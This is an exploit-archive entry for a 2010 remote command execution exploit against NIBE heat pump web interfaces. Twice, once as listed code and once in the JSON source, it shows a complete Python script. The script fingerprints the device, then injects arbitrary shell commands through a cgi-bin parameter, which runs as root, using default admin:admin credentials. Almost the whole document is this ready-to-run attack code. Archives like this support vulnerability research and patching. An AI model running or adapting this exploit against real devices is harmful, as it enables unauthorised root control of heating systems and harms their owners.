Search...

NIBE Heat Pump Remote Command Execution

2010-04-28T00:00:00

ID PACKETSTORM:89010
Type packetstorm
Reporter Jelmer de Hen
Modified 2010-04-28T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
import socket,sys,os,base64  
# NIBE heat pump RCE exploit  
#  
# Written by Jelmer de Hen  
# Published at http://h.ackack.net/?p=302  
#  
# Web interface is running with root rights  
#  
  
  
def finger_heatpump(ip, port):  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((ip, port))  
s.send("GET / HTTP/1.1\n\n")  
header = s.recv(1024)  
s.close()  
if header.find("NIBE") !=-1:  
return 1  
else:  
return 0  
  
def exploit_pump(ip, port, command, basic_auth):  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((ip, port))  
s.send("GET /cgi-bin/exec.cgi?script=;%20"+command+" HTTP/1.1\nAuthorization: Basic "+basic_auth+"\n\n")  
cmd_result = ""  
while s.recv(1024):  
cmd_result = cmd_result + s.recv(1024)  
s.close()  
return cmd_result  
  
def instructions():  
print sys.argv[0]+" [ip] [port] [filename] [username (default=admin)] [password (default=admin)]"  
print "Written by Jelmer de Hen"  
print "published at http://h.ackack.net/?p=302"  
print "Examples (for spaces in commands use %20 instead of \"\x20\"):"  
print sys.argv[0]+" 127.0.0.1 80 \"ls%20-al\""  
sys.exit(1)  
  
def main():  
if len(sys.argv)==4 or len(sys.argv)==6:  
try:  
ip = sys.argv[1]  
port = int(sys.argv[2])  
command = sys.argv[3]  
except:  
instructions()  
try:  
basic_auth = base64.b64encode(sys.argv[4]+":"+sys.argv[5])  
except:  
basic_auth = base64.b64encode("admin:admin")  
  
if finger_heatpump(ip, port) == 1:  
print "[+] Fingerprint scan success"  
command_result = exploit_pump(ip, port, command, basic_auth)  
if len(command_result)==0:  
print "[-] The exploit failed, you can retry the exploit or the username and/or password are not right"  
else:  
print "[+] Contents of "+command_result+":"  
print command_result  
else:  
print "[-] Fingerprint scan failed"  
  
else:  
instructions()  
  
if __name__ == "__main__":  
sys.exit(main())  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:89010", "type": "packetstorm", "bulletinFamily": "exploit", "title": "NIBE Heat Pump Remote Command Execution", "description": "", "published": "2010-04-28T00:00:00", "modified": "2010-04-28T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/89010/NIBE-Heat-Pump-Remote-Command-Execution.html", "reporter": "Jelmer de Hen", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:17:11", "viewCount": 2, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2016-11-03T10:17:11", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:17:11", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/89010/nibe_heatpump_rce.py.txt", "sourceData": "`#!/usr/bin/python \nimport socket,sys,os,base64 \n# NIBE heat pump RCE exploit \n# \n# Written by Jelmer de Hen \n# Published at http://h.ackack.net/?p=302 \n# \n# Web interface is running with root rights \n# \n \n \ndef finger_heatpump(ip, port): \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect((ip, port)) \ns.send(\"GET / HTTP/1.1\\n\\n\") \nheader = s.recv(1024) \ns.close() \nif header.find(\"NIBE\") !=-1: \nreturn 1 \nelse: \nreturn 0 \n \ndef exploit_pump(ip, port, command, basic_auth): \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect((ip, port)) \ns.send(\"GET /cgi-bin/exec.cgi?script=;%20\"+command+\" HTTP/1.1\\nAuthorization: Basic \"+basic_auth+\"\\n\\n\") \ncmd_result = \"\" \nwhile s.recv(1024): \ncmd_result = cmd_result + s.recv(1024) \ns.close() \nreturn cmd_result \n \ndef instructions(): \nprint sys.argv[0]+\" [ip] [port] [filename] [username (default=admin)] [password (default=admin)]\" \nprint \"Written by Jelmer de Hen\" \nprint \"published at http://h.ackack.net/?p=302\" \nprint \"Examples (for spaces in commands use %20 instead of \\\"\\x20\\\"):\" \nprint sys.argv[0]+\" 127.0.0.1 80 \\\"ls%20-al\\\"\" \nsys.exit(1) \n \ndef main(): \nif len(sys.argv)==4 or len(sys.argv)==6: \ntry: \nip = sys.argv[1] \nport = int(sys.argv[2]) \ncommand = sys.argv[3] \nexcept: \ninstructions() \ntry: \nbasic_auth = base64.b64encode(sys.argv[4]+\":\"+sys.argv[5]) \nexcept: \nbasic_auth = base64.b64encode(\"admin:admin\") \n \nif finger_heatpump(ip, port) == 1: \nprint \"[+] Fingerprint scan success\" \ncommand_result = exploit_pump(ip, port, command, basic_auth) \nif len(command_result)==0: \nprint \"[-] The exploit failed, you can retry the exploit or the username and/or password are not right\" \nelse: \nprint \"[+] Contents of \"+command_result+\":\" \nprint command_result \nelse: \nprint \"[-] Fingerprint scan failed\" \n \nelse: \ninstructions() \n \nif __name__ == \"__main__\": \nsys.exit(main()) \n`\n", "immutableFields": []}